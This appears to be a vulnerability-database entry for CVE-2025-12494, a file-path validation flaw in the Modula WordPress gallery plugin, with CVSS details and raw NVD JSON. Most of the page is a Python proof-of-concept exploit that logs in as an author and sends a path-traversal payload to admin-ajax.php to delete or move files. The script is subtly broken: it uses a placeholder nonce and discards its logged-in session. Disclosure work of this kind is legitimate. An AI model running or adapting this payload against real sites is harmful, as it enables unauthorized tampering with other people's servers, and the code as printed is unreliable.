Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-12494 CVSS 4.3 MEDIUM

CVE-2025-12494

Published: 2025-11-15 06:15:42
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Image Gallery – Photo Grid & Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_import_file function in all versions up to, and including, 2.12.28. This makes it possible for authenticated attackers, with author-level access and above, to move arbitrary image files on the server.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Modula Best Grid Gallery <= 2.12.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import quote # CVE-2025-12494 PoC - Modula Best Grid Gallery Arbitrary File Deletion # Author: Security Researcher # Target: WordPress with Modula Best Grid Gallery plugin <= 2.12.28 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_nonce_and_cookie(): """Get WordPress nonce and authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") return None, None print("[+] Login successful!") # Get nonce for AJAX request admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=modula" admin_response = session.get(admin_url) # Extract nonce from page source nonce_match = str(admin_response.text).find('modulaImportImages') if nonce_match == -1: print("[-] Could not find nonce!") return None, None nonce = "extract_nonce_here" # Extract from actual response return session.cookies.get_dict(), nonce def exploit_arbitrary_file_deletion(session, cookies, nonce): """Exploit the arbitrary file deletion vulnerability""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Target file to delete - using path traversal malicious_path = "../../../wp-content/uploads/2024/01/innocent-image.jpg" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Referer': f"{TARGET_URL}/wp-admin/" } # Malicious payload to delete arbitrary file payload = { 'action': 'modula_ajax_import_file', 'modula-import-images': nonce, 'import_file': malicious_path, 'gallery_id': '1' } print(f"[*] Sending malicious request to delete: {malicious_path}") response = session.post(ajax_url, data=payload, cookies=cookies, headers=headers) if response.status_code == 200: print("[+] Request sent successfully!") print(f"[*] Response: {response.text[:500]}") else: print(f"[-] Request failed with status: {response.status_code}") if __name__ == "__main__": cookies, nonce = get_nonce_and_cookie() if cookies and nonce: session = requests.Session() exploit_arbitrary_file_deletion(session, cookies, nonce)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12494", "sourceIdentifier": "[email protected]", "published": "2025-11-15T06:15:42.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Gallery – Photo Grid & Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_import_file function in all versions up to, and including, 2.12.28. This makes it possible for authenticated attackers, with author-level access and above, to move arbitrary image files on the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L554", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L567", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L589", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L597", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3391790/modula-best-grid-gallery/trunk?contextall=1&old=3390878&old_path=%2Fmodula-best-grid-gallery%2Ftrunk", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-12494/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca423309-d8bd-46a4-9e88-9534d9c60b4a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.